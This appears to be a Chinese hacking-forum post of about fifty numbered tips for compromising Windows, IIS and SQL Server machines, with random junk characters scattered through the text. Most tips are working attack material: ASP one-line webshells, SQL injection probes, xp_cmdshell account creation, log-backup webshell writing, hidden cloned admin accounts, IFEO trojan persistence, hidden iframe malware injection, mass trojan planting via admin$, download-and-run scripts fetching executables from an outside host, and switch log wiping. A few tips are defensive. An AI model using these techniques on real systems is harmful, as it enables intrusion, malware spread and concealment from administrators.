Xp系统修改权限防止病毒或木马等破坏系统,cmd下,# L7 A, }/ z/ ?! T
cacls C:\windows\system32 /G hqw20:R: G! d- X: w# t7 l* R7 R
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
7 ~+ S( }2 x7 _) F! u& m. f, h# v恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F! E* K2 Q* a( S
6 b: _% ~# Q' I/ H! Q [, V
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。7 J. W4 w7 a% Z6 U1 |+ D" D2 k1 c
% i6 d$ n0 \5 G0 K; u
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
+ D3 ^4 h8 }2 I2 R% n( ~# P
' T! a( z& r W; k: z/ D4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 ]2 p5 C2 K: H; b1 g1 I: Z( {& e4 y }" |% S5 {' J
5、利用INF文件来修改注册表
1 h1 n! x5 B( g, C7 n% `8 X) p! @[Version]8 [1 O6 K: U- i
Signature="$CHICAGO$"0 ^7 Y6 y0 R9 r/ l; k& A, O% S4 t
[Defaultinstall]9 u z- j, F% e% a0 s
addREG=Ating
3 F1 m0 |# }) C& l W) M, f[Ating]
8 ]! l0 V+ r: b$ jHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"" }0 y- D9 R, q. ~; J0 M3 c0 [
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下: i$ ^8 {3 ]8 s' b0 d
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径# J$ t, ] n) X( S5 E
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 W& w4 S2 x8 K
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
y o& V i# fHKEY_CURRENT_CONFIG 简写为 HKCC
4 g7 X( d% ?* a, P( ^( A3 \7 y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值2 v9 I: X. i( O! ^' i- K
"1"这里代表是写入或删除注册表键值中的具体数据
% R y- U9 W( j& p7 |0 n; w* y$ L
3 P0 a8 F4 Z+ n6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画, a3 z4 r V- Z! z3 j
多了一步就是在防火墙里添加个端口,然后导出其键值% B( N2 w6 s! b! N& ?( \& X |
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]4 X' B! a- n! B+ I1 Y* t
8 i R9 U, r4 P1 g+ Z7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
, Q1 J" K q. X3 j: r在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
2 a R+ b# a1 g, Z7 B, m8 T
- w( v- [% j2 v6 z `& J8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。+ q: Q2 A8 m' U0 T! t- M' [
; Z! a2 G- a9 ^1 R1 n4 V, l9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
: ~! B2 Y, X; E/ j可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。6 ^$ f3 k/ g( z$ d8 n! m
) R& a7 n, E7 X# p8 A2 Y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
3 I* u* `, T4 G# E! G1 J, H+ h! q7 J( w/ j3 t) h, X
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) ^/ ~) M% J* ^用法:xsniff –pass –hide –log pass.txt
7 q1 d+ i0 J X- V' G8 d8 |7 T* s
12、google搜索的艺术
- q$ r* n8 @, i" g% a搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”) T7 @6 b: S n) v
或“字符串的语法错误”可以找到很多sql注入漏洞。1 b2 q6 b. Q9 A' W: _( G1 G* g
2 h' g* v" D' @+ l; B
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- d9 t. E* g6 C0 I, o4 v; Z3 w3 g4 j3 e
14、cmd中输入 nc –vv –l –p 1987
+ `, @$ G6 r" @; W7 T# z做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃0 M9 j+ h: r6 ` A' C" _
7 ~+ S! g1 z; X& {! w* r# u6 Z) w15、制作T++木马,先写个ating.hta文件,内容为6 ^5 V0 o+ a. H# z1 x( l
<script language="VBScript">9 S3 w4 v& l. O0 Q- n- S8 X
set wshshell=createobject ("wscript.shell" ): i' p+ d, f; v. n
a=wshshell.run("你马的名称",1)
, n" `! } u) M6 S3 dwindow.close
( w B# A$ n$ [</script>" F Y. N4 `2 `3 q3 V! b0 I
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
G) m- f9 T2 B/ G6 Z0 a: s
/ x0 N( B; j) ]! @ N) k* t' ]" G16、搜索栏里输入7 K, K9 |: |' q( o
关键字%'and 1=1 and '%'='
. |- e" \' o1 v ?8 N( i; g' Y关键字%'and 1=2 and '%'='+ a2 ~) g i$ N
比较不同处 可以作为注入的特征字符
" Z1 I+ J8 p% d/ E* A
C5 u. i; J) r8 Y6 l8 ~7 C5 l* |17、挂马代码<html>
8 ^( U( q4 ?" l0 R* p<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& A, }0 b+ i. E
</html>
- s$ V- p: M7 R t; A) W+ s. d$ Z
3 d7 h6 {, n1 \, X. V7 E C* b+ Y18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! Q0 l3 e# s. z' Vnet localgroup administrators还是可以看出Guest是管理员来。
! p) I* ] I6 Z* A0 ?" }4 g# Q' { I- W
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等& ]' {, C4 N) @/ D+ P
用法: 安装: instsrv.exe 服务名称 路径& {; [& H/ I8 p% h/ \
卸载: instsrv.exe 服务名称 REMOVE0 k% _4 Q& o( r. o1 [, U: E
0 x2 T) f3 t L* h* p4 B8 [
! B3 R( {/ v* i ~6 O; A
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 v; J; L% \6 P
不能注入时要第一时间想到%5c暴库。+ ?% T0 P. U' z: ] h( H* `
) Y; C9 L* W) d& g
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~1 i4 E9 B+ [% @+ y
" U5 ^+ H* j+ ^* L' O1 P. c( w8 y
23、缺少xp_cmdshell时
% O$ L, i2 }8 E( t3 [# T尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 g! K: J2 Q/ f+ d3 S C( s$ [1 {假如恢复不成功,可以尝试直接加用户(针对开3389的)
! x0 f# U" j3 n- i N0 { Xdeclare @o int
2 g* P2 x f6 yexec sp_oacreate 'wscript.shell',@o out
0 s! D! K3 w9 l3 V) Z) Yexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( X, I% t9 V1 M# p( ?* o( _8 d y6 M
24.批量种植木马.bat0 A* B" p4 K1 @" {" b3 v$ S- w
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
7 p/ f1 f+ b7 h& Ofor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ u4 B0 ?5 D$ c l
扫描地址.txt里每个主机名一行 用\\开头5 t5 `0 X/ }' P
0 K, ?; Z6 i) f$ S) R25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 t+ e0 f/ ~% F' K8 R B5 z
3 M4 B& Y+ z! U; @- p26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
~- ?3 P# [" _- `将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.' C" q6 t h& F. Y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
( q( Z+ ~ y% `4 i" v+ D6 ?0 T0 H4 U: \" q6 J0 @% f2 f
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
T/ A1 ?8 T& I; h8 A$ R j然后用#clear logg和#clear line vty *删除日志) V6 |6 H0 e: s+ |
2 F& J% s6 A# Q* d" o" K* F
28、电脑坏了省去重新安装系统的方法
2 P0 \- s9 i1 o6 P纯dos下执行,
0 W- _. u5 e$ @7 z4 ^% v1 W) t; x$ ]xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
5 E& W5 ]/ f/ t8 A2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; t- k" @4 |3 V* g/ B
@9 }) N2 N3 Y) R( Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:
9 ^- {. N& b$ a4 }HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 G. @% _* g; B9 o! V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 w+ r6 b6 p4 m' t2 S8 V2 c9 KHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- q# J6 G6 s/ }- D! L- p9 b: e. w
分别用
* ]' `( C4 [0 M2 e4 L) sregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ q" d W" {; M& @; f( Pregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" g& d- r4 w: u! A9 vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) j% A; Y/ ` {- a: @: P1 j8 Y/ Q4 I
命令来导出注册表项
6 H/ z2 Q8 q9 l4 I! n+ _然后把三个文件里的EnableSecurityFilters"=dword:00000001,) T4 o; {& N1 U6 j8 E0 P; y, d
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 B' b$ A3 y- g0 W2 k5 I2 h4 @ k) {
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
" X0 x1 P p0 S, T( w" r% w, g! x( p- A
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
, Y- B- o# |/ J pSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3( f, b$ V8 h3 v" j8 `
3 h0 k" w# k+ q6 _: I
31、全手工打造开3389工具
( P% b! R. q, j+ \- [3 p打开记事本,编辑内容如下:' g* W0 K8 G: P: z$ H
echo [Components] > c:\sql& m( Y& H. Z) p4 d+ \8 ?
echo TSEnable = on >> c:\sql1 g- @* g4 r7 ?
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q- P1 k* {( `! W1 z. N' C% }3 r
编辑好后存为BAT文件,上传至肉鸡,执行
- o \' [: R& m& l
! |$ X. P! L; j/ k% }$ _1 w32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
' M. F9 e; t9 a& z
" x, ~# P4 e: k6 _33、让服务器重启, z0 U( `4 b. \7 q5 ?: k! E
写个bat死循环:
" o9 a, `' H, N6 z5 z@echo off+ z6 b* p' { ^( r, @
:loop1
5 [/ w9 p2 W. Q( ? r# R4 m c( s( Mcls o" ~/ ^* {! ?' W# P8 z0 A
start cmd.exe* C1 m+ {. ]! _7 Y
goto loop1
! N5 y" F5 D6 t7 c( {( w" b9 j0 ?保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启. l- F; y; u$ E) E
8 [; M2 I4 x4 C* {( o2 q% ]1 @# {34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; D% ^6 M- H7 ]4 T6 G@echo off! ` a8 H h* l$ \7 D& Y. c- c
date /t >c:/3389.txt
( o: ?0 [2 D1 W# ^time /t >>c:/3389.txt5 j3 j2 ]% c( l& g9 A: e! z
attrib +s +h c:/3389.bat; w& L% B/ @* R: a" I: p
attrib +s +h c:/3389.txt
0 F6 Y8 E5 }* c' u0 }. Ynetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
1 _5 u& G2 w' e8 ^6 q并保存为3389.bat
; n3 C! c% u. Y打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
f1 D P3 g+ y- ]: m0 `( ^+ h
' {2 }1 t4 K8 w35、有时候提不了权限的话,试试这个命令,在命令行里输入:
; q- C+ y' U" H7 k1 D; P- xstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)4 s- t/ a9 t& a! _) y9 v9 h! J0 ~! c
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
& g6 q, a1 ^* `! c5 t# J4 j
3 `$ \6 } Y0 ?4 n' |; \36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& K4 x! A3 i" V9 Y a* ~9 techo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址4 c9 c1 Q4 d. ?3 n
echo 你的FTP账号 >>c:\1.bat //输入账号
% n# }' E( u/ c$ O6 techo 你的FTP密码 >>c:\1.bat //输入密码
& Z, _5 T2 K& ?" j8 o J& Pecho bin >>c:\1.bat //登入, m. c* A8 k$ D B' Y. \: w0 c
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么1 @+ G% J+ Q. e* ^ _6 s/ X
echo bye >>c:\1.bat //退出; y& t/ Z A! S: [1 ~
然后执行ftp -s:c:\1.bat即可, D, l, R6 V* j1 c& R% t6 {/ b
/ K6 i# i- ~# T6 [
37、修改注册表开3389两法
7 }1 ?% Y* F# R5 X4 _(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% r5 `. Z7 u! s+ b7 ~ p! F9 Oecho Windows Registry Editor Version 5.00 >>3389.reg
) M* e% q# d; B0 {# h& z' `4 wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
' s) z! h- w$ j: recho "Enabled"="0" >>3389.reg( f$ J% s; v0 a) C5 Y% m
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows- [8 L7 Z3 ?9 G! y' a
NT\CurrentVersion\Winlogon] >>3389.reg
s- r( g, O7 M: m- d/ S0 lecho "ShutdownWithoutLogon"="0" >>3389.reg
~. X9 ]/ `- Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) X0 q3 _! M# L* W>>3389.reg
* D, D2 Z5 F& h- t/ E9 C5 _echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& j( T/ w0 P; F' pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' L9 C6 ]' ?6 E2 v8 a0 ~' s
>>3389.reg' u/ P) K( C4 h
echo "TSEnabled"=dword:00000001 >>3389.reg
- [- r1 f# _' aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" [$ D. [# |! Y$ Q# w: J
echo "Start"=dword:00000002 >>3389.reg
7 A% o) f- a( S4 m9 E, h# C0 M9 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]1 i1 A/ Q5 L9 H$ p) o
>>3389.reg3 A% T) n0 ]+ ]1 ?! C; j
echo "Start"=dword:00000002 >>3389.reg
( B$ I) s$ Y4 o+ Z5 @echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg0 H4 d8 H" v; {0 r. z* k
echo "Hotkey"="1" >>3389.reg, u2 |6 x9 _2 C' K* K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 L) q" O! d X) T7 C0 k; l
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
6 f# E7 `; Z8 }. w. s/ j& yecho "PortNumber"=dword:00000D3D >>3389.reg
* n$ E/ I# R$ ~1 u! cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal N5 ]" G( V9 P1 S3 d
Server\WinStations\RDP-Tcp] >>3389.reg7 i, }$ ]. q; Y" ~7 P- q" J
echo "PortNumber"=dword:00000D3D >>3389.reg. D( k! A' w5 n' [9 r7 o3 M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。! g: Z6 _/ C1 u$ P% [! m% C; |
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ d6 l# V+ N, G因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效' x8 i$ }2 x5 F m" l' d
(2)winxp和win2003终端开启
! _- b2 d( k }5 K( k用以下ECHO代码写一个REG文件:
0 C7 z7 R* r) {) [) E, @echo Windows Registry Editor Version 5.00>>3389.reg
4 K9 t7 v+ c! P$ Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& H0 q6 {5 d% mServer]>>3389.reg
8 f+ ?( _7 R7 N6 ^- Oecho "fDenyTSConnections"=dword:00000000>>3389.reg0 _9 `& O n& I$ k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! c. \+ |& d. _2 UServer\Wds\rdpwd\Tds\tcp]>>3389.reg" Y ^. k/ x S6 I- p% a; \
echo "PortNumber"=dword:00000d3d>>3389.reg$ `+ }% I+ v& e Z3 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% Z$ `4 Z. X" e {) \: e- Z# kServer\WinStations\RDP-Tcp]>>3389.reg- s' C2 K8 w8 q: E. _- o
echo "PortNumber"=dword:00000d3d>>3389.reg
# G. k2 ?% y3 }5 C4 Q然后regedit /s 3389.reg del 3389.reg
- I8 r. a# B# H" ^! ]0 ~XP下不论开终端还是改终端端口都不需重启
* H9 t3 a) Z6 a7 ~
$ @8 z5 V5 |* {' K3 ]/ e38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
6 E- Z- y$ g6 F用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'1 e3 d6 Q, \1 |: S1 `2 y4 C
& h8 j4 K X! w4 k% S: g
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 ~; J Z- W& L- ]3 Y, ?5 B(1)数据库文件名应复杂并要有特殊字符
: y2 j& _, V- W+ i(2)不要把数据库名称写在conn.asp里,要用ODBC数据源8 `* V( v, a; ~% Z! j0 x) {
将conn.asp文档中的
: O( e- o" d1 J5 Z; BDBPath = Server.MapPath("数据库.mdb") \% W5 ]' Z$ ^0 e7 n' ]- n- s) v8 G
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
; u, l% W6 v% O- N' A' ^, U4 d) A9 v! r# S: [6 i4 ]3 H6 A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置! Y$ c% Q2 u, |$ d! z
(3)不放在WEB目录里, H0 P2 }- i, H- m; O
! ~2 Z4 h) l% F) ?% D# T
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉0 r6 x3 u* R: i2 x j6 E3 @. b) w
可以写两个bat文件. ~2 z- ~) Z# h9 M
@echo off0 T6 Q' Y7 Y2 V* F% N' z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
% p7 ]' E& U9 h@del c:\winnt\system32\query.exe
3 B% Z" n. ~: K! q0 Q@del %SYSTEMROOT%\system32\dllcache\query.exe
% l8 n+ }3 a' B: m8 B@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
1 g: P, q. P2 c8 Q7 U
% ]+ n1 r, T$ M+ N9 e( p' I' u@echo off
% k/ y9 J3 K' x0 l% H@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 X8 J1 g3 z7 d2 S7 ~3 ]7 Z
@del c:\winnt\system32\tsadmin.exe
u7 K0 P* j% p) A@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* Q/ D8 }0 K2 f+ }1 G* m' g
0 \! |6 b! J3 Y M! D' m3 @41、映射对方盘符# |6 `; R- I, e. l8 j; e
telnet到他的机器上,# ?* [: F7 I! e0 w8 F) s
net share 查看有没有默认共享 如果没有,那么就接着运行% ]1 E1 w! V" Q: |5 x
net share c$=c:
/ W( k5 D0 U5 I: F2 k4 ?' @net share现在有c$
9 z: f/ |8 E; K. K+ N在自己的机器上运行, v# D# R( |, E9 ?+ S! J
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K% j3 D% }2 U- W$ A+ I4 D
! l/ G7 e' T' U! A$ B9 D, T
42、一些很有用的老知识. S" I G2 F& L: I) v
type c:\boot.ini ( 查看系统版本 )
( ?4 A. t1 X! t4 k L! p; U. v6 \# wnet start (查看已经启动的服务), M+ O) j( }* D5 r0 G- l* |
query user ( 查看当前终端连接 )
0 {" U2 _4 q( U& ?$ f; A. X2 b. Rnet user ( 查看当前用户 )
+ O+ u# {( X7 @4 Qnet user 用户 密码/add ( 建立账号 )4 m2 P/ j$ m% h' u4 r4 c: }
net localgroup administrators 用户 /add (提升某用户为管理员)
$ z& v" I& P9 Y: }& o; u6 Cipconfig -all ( 查看IP什么的 )
% M0 e9 y- a- A/ O* F( tnetstat -an ( 查看当前网络状态 )
2 g4 |5 B. _' S U1 q$ Nfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)- w0 K9 c8 G* c2 i7 p
克隆时Administrator对应1F4
/ w) R0 {' \9 B2 l! U' z+ ^; G, @$ }guest对应1F5# p/ t8 K; O T& h
tsinternetuser对应3E8
+ m: G' r( \# L2 X
5 i, @8 S% _8 \! i2 q43、如果对方没开3389,但是装了Remote Administrator Service
3 K6 `% k* U& t6 @; h) w$ ]) t) e用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
) x5 e2 r1 {6 f l' C" K' I; T解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" Z: g" k4 U- a先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' x0 m4 v8 ^3 r
! n# k: ?. d; Z1 G, c) a4 V' v44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 O% a- t5 D# i# l/ a$ N4 s/ f本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)8 A [2 m" M- A5 B6 t8 W4 n" |, n
9 p3 N5 S& H7 J8 _45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入). S5 O) {: S9 }9 y8 q( }% v
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
$ J6 x: T" C; B; g8 {^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
0 \& O$ Q0 Q% UCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% [, T- b0 Y+ K* @1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 s$ h8 i' P- m6 \ v3 y
(这是完整的一句话,其中没有换行符)* D; T" W) H- w( k( z4 ^- p p
然后下载:0 _, @+ | Q- V0 t) g
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
5 |# s) O s+ J4 [* v9 c5 c; _( n5 j
46、一句话木马成功依赖于两个条件:
/ b9 a d* w. p2 R; J1、服务端没有禁止adodb.Stream或FSO组件
/ W4 b5 {, M% Q2 |/ E7 ~( X3 D8 H2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: V/ z; d! d' W* ?
7 Y( `2 X3 B6 B' H. h1 U' p7 G47、利用DB_OWNER权限进行手工备份一句话木马的代码:& x1 G+ P! a/ ?- q& x8 w
;alter database utsz set RECOVERY FULL--
, g q5 _; E, Y/ a; C/ g' a;create table cmd (a image)--1 [3 |+ q, b8 y$ {
;backup log utsz to disk = 'D:\cmd' with init--% t) W* c9 D* l h0 m
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--$ ]' {2 A7 q# ^
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--) I7 K% ~. A, Y0 S& h
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: X7 l; W( I7 V3 \4 `) `* B( f" T
2 T1 V+ }3 S+ ^ h6 U48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:7 V! F0 R, z- \7 G# _5 Q8 L
8 Y. w; @) y$ p
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
; X7 B% M, g- e: Y) O! _- L所有会话用 'all'。, w( u! O* V8 t3 A2 k! y
-s sessionid 列出会话的信息。
* ]' q6 x6 A8 c! j, @+ q6 w-k sessionid 终止会话。
' T0 j6 M0 X: z; b: y, m/ c$ ^" {-m sessionid 发送消息到会话。/ B6 l3 N* B' F) k
: ~/ Y$ o3 w$ R- ^
config 配置 telnet 服务器参数。. I+ o) m& C9 M, @
1 L" @- H2 C! g+ y4 {( b1 m7 O9 n0 O
common_options 为:$ t; n; w* _3 |) Z: Z2 ]7 Y+ s6 I
-u user 指定要使用其凭据的用户
; q7 z F, [2 U/ k-p password 用户密码& F+ [. G6 I4 Z1 X! k
8 `( y6 j/ w u4 c" J3 Vconfig_options 为:
1 }4 A) O. ]3 s: j. P2 K Xdom = domain 设定用户的默认域# \6 W f, m1 Q5 a
ctrlakeymap = yes|no 设定 ALT 键的映射" d5 K% `/ V: }
timeout = hh:mm:ss 设定空闲会话超时值. }" r* x4 e- x! S' C
timeoutactive = yes|no 启用空闲会话。- P# r: e( e0 ~! r
maxfail = attempts 设定断开前失败的登录企图数。- @2 g5 J: d- H" w2 I5 X
maxconn = connections 设定最大连接数。
( |0 W) Z& S: M* `7 a, Gport = number 设定 telnet 端口。
2 s3 _7 t4 z, _$ psec = [+/-]NTLM [+/-]passwd
P9 H. d* G# u+ s设定身份验证机构6 f" w" n3 x5 @: e
fname = file 指定审计文件名。( P$ f K* @0 M' Q7 g% p
fsize = size 指定审计文件的最大尺寸(MB)。
( e r) x5 y" e! S, y5 `# s7 {mode = console|stream 指定操作模式。
, j5 D5 f$ E! k2 g. [, Nauditlocation = eventlog|file|both. Y1 C s) L: v, c
指定记录地点* ~; N8 q8 b- W3 n5 Q
audit = [+/-]user [+/-]fail [+/-]admin6 ?1 Q1 c& ?/ E+ [
5 J; F1 O7 q: Q7 U
49、例如:在IE上访问:
* k7 B+ \- j' nwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/' W; f( j8 a) c% i5 Y2 F
hack.txt里面的代码是:
: u X( F+ K' A+ y- y/ ]+ ]9 ~<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
3 F. [ {/ E# O! o2 l7 @( g把这个hack.txt发到你空间就可以了!
/ Q7 Q" X+ {0 K" J1 U* ~' W& N这个可以利用来做网马哦!
- V2 d( t4 x# V: w" C8 J5 l! c- K2 c# B/ L, i5 n. D' p
50、autorun的病毒可以通过手动限制!
. c! O) H1 j- p! \3 m3 l" s3 w1 }1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
1 _5 N: S$ V M7 x3 S3 V: Z2,打开盘符用右键打开!切忌双击盘符~
3 X' j* r' B' K3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!8 B3 _/ O; F' q( }- j! _
8 j, R3 |% Y+ m% x1 c7 N51、log备份时的一句话木马:. G w- `2 o6 e' a' T1 o7 Y
a).<%%25Execute(request("go"))%%25>
1 E" j8 Q) E. q: G. m' [2 Kb).<%Execute(request("go"))%># \/ `1 }7 O6 I
c).%><%execute request("go")%><%
" }8 Q& \' U Q! c- _d).<script language=VBScript runat=server>execute request("sb")</Script>
$ v6 ~1 G7 {/ [: ve).<%25Execute(request("l"))%25>
7 Y8 x2 l2 o% |; |! jf).<%if request("cmd")<>"" then execute request("pass")%>
5 |; ^! H" O, [* @6 ~% e/ @: t/ B( Y& f0 H8 l
52、at "12:17" /interactive cmd
+ |1 S5 |( a# N! H执行后可以用AT命令查看新加的任务
. F. ]4 I% a1 ~$ J; q, H用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 f; r& c" K1 S; ?
